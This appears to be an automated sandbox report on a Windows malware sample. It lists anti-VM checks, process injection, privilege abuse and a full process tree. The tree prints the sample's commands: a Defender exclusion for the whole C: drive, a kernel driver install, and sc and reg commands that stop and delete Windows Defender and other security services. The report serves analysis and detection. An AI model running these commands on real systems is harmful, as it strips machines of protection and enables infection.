\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TbV75ZR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 376c5cde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cd71e90de3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bb770c5446.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Exam.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fc32507700.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 44c4d0390b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TbV75ZR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp80F8SEVFBWGVS7JF51DS61OK9MWDHURZ.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 8832 timeout.exe 6392 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 8048 taskkill.exe 2232 taskkill.exe 8248 taskkill.exe 8352 taskkill.exe 8660 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1498259476-758239146-3116387113-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10136 schtasks.exe 5728 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4596 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe 4596 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe 644 rapes.exe 644 rapes.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 2400 powershell.exe 2400 powershell.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 8220 powershell.exe 8220 powershell.exe 8220 powershell.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 8944 powershell.exe 8944 powershell.exe 8944 powershell.exe 5028 taskmgr.exe 1816 powershell.exe 1816 powershell.exe 1816 powershell.exe 5028 taskmgr.exe 9524 powershell.exe 9524 powershell.exe 9524 powershell.exe 5028 taskmgr.exe 5028 taskmgr.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 684 Process not Found 684 Process not Found 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe 13012 376c5cde.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2296 f73ae_003.exe 2296 f73ae_003.exe 2296 f73ae_003.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5028 taskmgr.exe Token: SeSystemProfilePrivilege 5028 taskmgr.exe Token: SeCreateGlobalPrivilege 5028 taskmgr.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeIncreaseQuotaPrivilege 2400 powershell.exe Token: SeSecurityPrivilege 2400 powershell.exe Token: SeTakeOwnershipPrivilege 2400 powershell.exe Token: SeLoadDriverPrivilege 2400 powershell.exe Token: SeSystemProfilePrivilege 2400 powershell.exe Token: SeSystemtimePrivilege 2400 powershell.exe Token: SeProfSingleProcessPrivilege 2400 powershell.exe Token: SeIncBasePriorityPrivilege 2400 powershell.exe Token: SeCreatePagefilePrivilege 2400 powershell.exe Token: SeBackupPrivilege 2400 powershell.exe Token: SeRestorePrivilege 2400 powershell.exe Token: SeShutdownPrivilege 2400 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeSystemEnvironmentPrivilege 2400 powershell.exe Token: SeRemoteShutdownPrivilege 2400 powershell.exe Token: SeUndockPrivilege 2400 powershell.exe Token: SeManageVolumePrivilege 2400 powershell.exe Token: 33 2400 powershell.exe Token: 34 2400 powershell.exe Token: 35 2400 powershell.exe Token: 36 2400 powershell.exe Token: SeTakeOwnershipPrivilege 6448 takeown.exe Token: SeDebugPrivilege 8220 powershell.exe Token: SeDebugPrivilege 8944 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeDebugPrivilege 9524 powershell.exe Token: SeDebugPrivilege 9844 tasklist.exe Token: SeDebugPrivilege 10276 powershell.exe Token: SeDebugPrivilege 11120 tasklist.exe Token: SeDebugPrivilege 13012 376c5cde.exe Token: SeBackupPrivilege 13012 376c5cde.exe Token: SeRestorePrivilege 13012 376c5cde.exe Token: SeLoadDriverPrivilege 13012 376c5cde.exe Token: SeShutdownPrivilege 13012 376c5cde.exe Token: SeSystemEnvironmentPrivilege 13012 376c5cde.exe Token: SeSecurityPrivilege 13012 376c5cde.exe Token: SeBackupPrivilege 13012 376c5cde.exe Token: SeRestorePrivilege 13012 376c5cde.exe Token: SeDebugPrivilege 13012 376c5cde.exe Token: SeSystemEnvironmentPrivilege 13012 376c5cde.exe Token: SeSecurityPrivilege 13012 376c5cde.exe Token: SeCreatePermanentPrivilege 13012 376c5cde.exe Token: SeShutdownPrivilege 13012 376c5cde.exe Token: SeLoadDriverPrivilege 13012 376c5cde.exe Token: SeIncreaseQuotaPrivilege 13012 376c5cde.exe Token: SeSecurityPrivilege 13012 376c5cde.exe Token: SeSystemProfilePrivilege 13012 376c5cde.exe Token: SeDebugPrivilege 13012 376c5cde.exe Token: SeMachineAccountPrivilege 13012 376c5cde.exe Token: SeCreateTokenPrivilege 13012 376c5cde.exe Token: SeAssignPrimaryTokenPrivilege 13012 376c5cde.exe Token: SeTcbPrivilege 13012 376c5cde.exe Token: SeAuditPrivilege 13012 376c5cde.exe Token: SeSystemEnvironmentPrivilege 13012 376c5cde.exe Token: SeLoadDriverPrivilege 13012 376c5cde.exe Token: SeLoadDriverPrivilege 13012 376c5cde.exe Token: SeIncreaseQuotaPrivilege 13012 376c5cde.exe Token: SeSecurityPrivilege 13012 376c5cde.exe Token: SeSystemProfilePrivilege 13012 376c5cde.exe Token: SeDebugPrivilege 13012 376c5cde.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4596 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 8036 bb770c5446.exe 5028 taskmgr.exe 8036 bb770c5446.exe 8036 bb770c5446.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 12000 Exam.com 12000 Exam.com 12000 Exam.com 5028 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 8036 bb770c5446.exe 5028 taskmgr.exe 8036 bb770c5446.exe 8036 bb770c5446.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 5028 taskmgr.exe 12000 Exam.com 12000 Exam.com 12000 Exam.com 5028 taskmgr.exe 5028 taskmgr.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 8800 firefox.exe 8800 firefox.exe 8800 firefox.exe 8800 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4596 wrote to memory of 644 4596 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe 82 PID 4596 wrote to memory of 644 4596 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe 82 PID 4596 wrote to memory of 644 4596 7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe 82 PID 644 wrote to memory of 2296 644 rapes.exe 90 PID 644 wrote to memory of 2296 644 rapes.exe 90 PID 644 wrote to memory of 2296 644 rapes.exe 90 PID 2296 wrote to memory of 5668 2296 f73ae_003.exe 91 PID 2296 wrote to memory of 5668 2296 f73ae_003.exe 91 PID 2296 wrote to memory of 3836 2296 f73ae_003.exe 93 PID 2296 wrote to memory of 3836 2296 f73ae_003.exe 93 PID 5668 wrote to memory of 2400 5668 cmd.exe 94 PID 5668 wrote to memory of 2400 5668 cmd.exe 94 PID 644 wrote to memory of 5924 644 rapes.exe 98 PID 644 wrote to memory of 5924 644 rapes.exe 98 PID 644 wrote to memory of 5924 644 rapes.exe 98 PID 5924 wrote to memory of 3184 5924 7IIl2eE.exe 99 PID 5924 wrote to memory of 3184 5924 7IIl2eE.exe 99 PID 5924 wrote to memory of 3184 5924 7IIl2eE.exe 99 PID 3836 wrote to memory of 1040 3836 svchost.exe 101 PID 3836 wrote to memory of 1040 3836 svchost.exe 101 PID 3836 wrote to memory of 2020 3836 svchost.exe 102 PID 3836 wrote to memory of 2020 3836 svchost.exe 102 PID 644 wrote to memory of 1596 644 rapes.exe 104 PID 644 wrote to memory of 1596 644 rapes.exe 104 PID 644 wrote to memory of 1596 644 rapes.exe 104 PID 1596 wrote to memory of 464 1596 apple.exe 105 PID 1596 wrote to memory of 464 1596 apple.exe 105 PID 1596 wrote to memory of 464 1596 apple.exe 105 PID 464 wrote to memory of 6208 464 11.exe 107 PID 464 wrote to memory of 6208 464 11.exe 107 PID 6208 wrote to memory of 6260 6208 cmd.exe 109 PID 6208 wrote to memory of 6260 6208 cmd.exe 109 PID 6208 wrote to memory of 6260 6208 cmd.exe 109 PID 6260 wrote to memory of 6312 6260 11.exe 110 PID 6260 wrote to memory of 6312 6260 11.exe 110 PID 6312 wrote to memory of 6360 6312 cmd.exe 112 PID 6312 wrote to memory of 6360 6312 cmd.exe 112 PID 6312 wrote to memory of 6376 6312 cmd.exe 113 PID 6312 wrote to memory of 6376 6312 cmd.exe 113 PID 6312 wrote to memory of 6392 6312 cmd.exe 114 PID 6312 wrote to memory of 6392 6312 cmd.exe 114 PID 6312 wrote to memory of 6416 6312 cmd.exe 115 PID 6312 wrote to memory of 6416 6312 cmd.exe 115 PID 6312 wrote to memory of 6432 6312 cmd.exe 116 PID 6312 wrote to memory of 6432 6312 cmd.exe 116 PID 6312 wrote to memory of 6448 6312 cmd.exe 117 PID 6312 wrote to memory of 6448 6312 cmd.exe 117 PID 6312 wrote to memory of 6460 6312 cmd.exe 118 PID 6312 wrote to memory of 6460 6312 cmd.exe 118 PID 6312 wrote to memory of 6480 6312 cmd.exe 119 PID 6312 wrote to memory of 6480 6312 cmd.exe 119 PID 6312 wrote to memory of 1100 6312 cmd.exe 120 PID 6312 wrote to memory of 1100 6312 cmd.exe 120 PID 6312 wrote to memory of 6512 6312 cmd.exe 121 PID 6312 wrote to memory of 6512 6312 cmd.exe 121 PID 6312 wrote to memory of 6536 6312 cmd.exe 122 PID 6312 wrote to memory of 6536 6312 cmd.exe 122 PID 6312 wrote to memory of 6552 6312 cmd.exe 123 PID 6312 wrote to memory of 6552 6312 cmd.exe 123 PID 6312 wrote to memory of 6560 6312 cmd.exe 124 PID 6312 wrote to memory of 6560 6312 cmd.exe 124 PID 6312 wrote to memory of 6584 6312 cmd.exe 125 PID 6312 wrote to memory of 6584 6312 cmd.exe 125 PID 6312 wrote to memory of 6612 6312 cmd.exe 126 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe"C:\Users\Admin\AppData\Local\Temp\7217bdd25c216cb1d57bcd05dde5bbb5917cabb4b41c090a71ea3f897c36d9a3.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'4⤵
- Suspicious use of WriteProcessMemory
PID:5668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵
- Downloads MZ/PE file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""5⤵
- Executes dropped EXE
PID:1040
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""5⤵
- Deletes itself
- Executes dropped EXE
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\{f8069699-b198-487c-9d53-fbb80f8eccb9}\7caa1dbd.exe"C:\Users\Admin\AppData\Local\Temp\{f8069699-b198-487c-9d53-fbb80f8eccb9}\7caa1dbd.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot6⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:3964 -
C:\Users\Admin\AppData\Local\Temp\{8fa0aedb-fdae-4624-b9ee-1739c4a30613}\376c5cde.exeC:/Users/Admin/AppData/Local/Temp/{8fa0aedb-fdae-4624-b9ee-1739c4a30613}/\376c5cde.exe -accepteula -adinsilent -silent -processlevel 2 -postboot7⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:13012
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5924 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat4⤵
- System Location Discovery: System Language Discovery
PID:3184
-
-
-
C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10338700101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C7C4.tmp\C7C5.tmp\C7C6.bat C:\Users\Admin\AppData\Local\Temp\11.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:6208 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6260 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C8FD.tmp\C8FE.tmp\C8FF.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"7⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:6312 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:6360
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:6376
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:6392
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:6416
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:6432
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6448
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6460
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:6480
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:1100
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵
- Modifies security service
PID:6512
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:6536
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:6552
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:6560
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:6584
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:6612
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:6628
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:6656
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:6688
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:6720
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:6756
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:6792
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:6816
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:6856
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:6900
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:6936
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:6968
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:7004
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:7036
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:4588
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:7084
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:7108
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:7144
-
-
